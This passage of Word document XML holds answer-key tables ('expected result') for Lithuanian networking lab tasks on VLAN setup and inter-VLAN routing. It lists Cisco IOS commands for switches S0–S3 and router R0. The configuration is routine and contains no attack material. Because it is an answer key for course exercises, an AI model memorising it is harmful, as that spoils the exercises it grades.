          <w:p w14:paraId="075CAE0F"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vlan)#name Guest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="098E33B8"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F62CB26"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interface FastEthernet0/1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C183835"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if)#switchport access vlan 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48314D6D"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if)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26743853"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interface FastEthernet0/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A186F1"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if)#switchport access vlan 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76C2ADA1"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1(config-if)#exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="258BF0C7"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witch&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04A0BC5E"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witch&gt;enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25670CDC"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witch#configure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D651BED"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witch(config)#hostname S2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AED424B"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no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B150000"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interface vlan 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FADE827"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if)#ip address 172.17.30.1 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DAFE639"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if)#no shutdown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1020128B"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39741F76"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ip default-gateway 172.17.30.254</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36E7B7DA"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vlan 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7284F2B2"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vlan)#name Staff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="715F81F5"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78099866"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vlan 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23287FC3"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vlan)#name Stud</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63BA154F"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D05DC0"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vlan 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78A977B9"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vlan)#name Guest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1862E07B"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vlan)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="244A944B"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interface FastEthernet0/1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C27D145"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if)#switchport access vlan 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E941D9A"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if)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13409F79"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interface FastEthernet0/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3132A89E"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if)#switchport access vlan 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F7B900F" w14:textId="77777777" w:rsidR="004E40BC" w:rsidRPr="005A5C28" w:rsidRDefault="004E40BC" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:outlineLvl w:val="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>S2(config-if)#exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2258430C" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4620CBD1" w14:textId="77777777" w:rsidR="00C25BA0" w:rsidRPr="005A5C28" w:rsidRDefault="00C25BA0"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16 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VLAN</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TINKLO SUDARYMAS IR KONFIGŪRAVIMAS. INTERVLAN ROUTING.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364AA7AE" w14:textId="231D980B" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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ATSAKYMAS</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F42309" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F42309" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4955"/>
        <w:gridCol w:w="4956"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="446BC2BE" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F1AED45"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Komutatorius S3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="270D4DBB"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Komutatorius S0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4AA58252" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="751ADB9F"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2268527B"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enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17310BEF"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ure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FA37BBB"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hostname S3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DCE9FB5"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lastRenderedPageBreak/>
              <w:t>S3(config)#no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AD1B661"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 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A4E4FA0"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name Staff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1951834C"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6726A9BD"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 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="514A9B2A"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name Stud</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="362F7C7D"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C7A645"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 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44427D4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name Guest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45CC1ECC"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42C65F70"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nterface FastEthernet0/1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4811AB"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switchport access vlan 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ADABFFD"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="550411D8"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nterface FastEthernet0/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="182D698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switchport access vlan 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2135522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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="159C94C8"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nterface FastEthernet0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33047980"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switchport access vlan 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DB5E9DB"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56D965E7"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nterface range fastEthernet 0/1-4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5277CA11" w14:textId="77777777" w:rsidR="00924E65"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range)#switchport mode trunk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11DAB195" w14:textId="1914EA93"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range)#switchport trunk allowed vlan 10,20,30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DDB67CA"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range)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35296EE0"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="118F4D96"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lastRenderedPageBreak/>
              <w:t>Switch&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41A02E89"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enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39261CB4"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ure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0628048E"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hostname S0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="484362EC"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lastRenderedPageBreak/>
              <w:t>S0(config)#no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C36DF6F"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 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40268E26"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name Staff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22282611"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="794920FB"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 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05832FFA"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name Stud</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D447CA"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ED2CC2D"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 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67EFB23D"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name Guest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7195AA78"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15B9B568"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nterface FastEthernet0/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10711B58"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switchport access vlan 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E32BA29"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B1CA3C4"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nterface FastEthernet0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74C36D1E"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switchport access vlan 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="083E0CB7"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F7A82D9"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nterface FastEthernet0/4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29FAABC8"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switchport access vlan 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="109CCF2E"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AC4E20A"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nterface fastEthernet 0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D91C34B" w14:textId="77777777" w:rsidR="00924E65"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switchport mode trunk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F0EAE49" w14:textId="588FBEA6"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switchport trunk allowed vlan 10,20,30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51412140"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exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="54DBF0CC" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A85571C"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eastAsia="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Komutatorius S1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="786BA669"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Komutatorius S2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7950F101" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14B1964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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BDE14C6"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enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11CFF5FB"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ure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="721C500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hostname S1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="433654E9"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no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="166455F9"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 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2242F771"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name Staff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E1B768D"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E9FEA84"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 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F4CE5A"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name Stud</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="659D2B09"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5988D807"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 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71D463A0"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name Guest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BFEDE38"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B9FF62A"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nterface FastEthernet0/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42B391C8"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switchport access vlan 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DEC8E7A"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7722E2F1"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nterface FastEthernet0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="106924E0"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switchport access vlan 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CB85974"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="374C73D5"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nterface FastEthernet0/4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B04912B"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switchport access vlan 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4941C97B"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BDB499F"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nterface fastEthernet 0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54481A55" w14:textId="77777777" w:rsidR="00924E65"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switchport mode trunk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BECD6EC" w14:textId="7BFDD7AE"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switchport trunk allowed vlan 10,20,30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17FDE46B"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exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="023097B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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D382B55"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enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EE3210B"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ure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A776037"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hostname S2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10B2E0D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no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39678CAA"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 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="548C2E5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name Staff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20D9F474"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6483D8DC"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 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31235E25"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name Stud</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34DF6C56"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A4BF03D"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 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E4C3B90"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name Guest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D95D043"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57638915"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nterface FastEthernet0/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="208ED64E"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switchport access vlan 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22C0227D"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FF7D91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nterface FastEthernet0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="224F6234"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switchport access vlan 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A77367C"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A722BD5"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nterface FastEthernet0/4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79085CB9"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switchport access vlan 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50DA16F3"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59AF37ED"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nterface fastEthernet 0/3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E274547" w14:textId="77777777" w:rsidR="00924E65"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switchport mode trunk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79395B4C" w14:textId="6D270CE9"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switchport trunk allowed vlan 10,20,30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28705A9D"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exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4769BE11" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="313AA781"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Maršrutizatorius R0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3238C85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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E53A89" w:rsidRPr="005A5C28" w14:paraId="7249F372" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EAD689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outer&gt;enable</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D916D14"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outer#configure terminal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F12490B"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outer(config)#hostname R0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B890E5A"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no ip domain-lookup</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43F86724"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nterface FastEthernet0/0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B999EC1"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f)#no shutdown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F6C2150"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f)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3246D3AE"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nterface FastEthernet0/0.10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="623376FA"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encapsulation dot1Q 10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B683A9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172.17.10.254 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="189BE68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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FE6B94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nterface FastEthernet0/0.20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="415DDD03"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encapsulation dot1Q 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48F4933B"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ip address 172.17.20.254 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69C121C9"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="313A16AE"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nterface FastEthernet0/0.30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C84D1F4"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encapsulation dot1Q 30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E772EB8"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ip address 172.17.30.254 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D4821B6"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="434206ED"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nterface FastEthernet0/0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57109AB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lastRenderedPageBreak/>
              <w:t>R0(config-if)#no shutdown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="330B8E6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f)#exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D6218C5"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nterface FastEthernet1/0.40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="175D2F3C"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encapsulation dot1Q 40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CE9D953"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ip address 10.1.1.254 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62433EC2"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exit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48CB9130"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nterface FastEthernet2/0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="448DA9D1"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f)#ip address 10.2.2.254 255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09B8866E"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f)#no shutdown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0709D2BA"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f)#exit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EE5D5DB" w14:textId="77777777" w:rsidR="00E53A89" w:rsidRPr="005A5C28" w:rsidRDefault="00E53A89" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6903956E" w14:textId="77777777" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B0A0121" w14:textId="77777777" w:rsidR="00C25BA0" w:rsidRPr="005A5C28" w:rsidRDefault="00C25BA0"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17 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>VLAN</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TINKLO SUDARYMAS IR KONFIGŪRAVIMAS. TINKLO PASLAUGOS. BEVIELIS TINKLAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E89E1E" w14:textId="6974A1C6" w:rsidR="0025204D" w:rsidRPr="005A5C28" w:rsidRDefault="0025204D"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ATSAKYMAS</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F42309" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00DC0673" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F42309" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4955"/>
        <w:gridCol w:w="4956"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4E4DF7C3" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4955" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A6B81B8"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Komutatorius S3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4956" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="295C2040"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Komutatorius S0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="641A039D" w14:textId="77777777" w:rsidTr="004A496A">
        <w:tc>
          <w:tcPr>
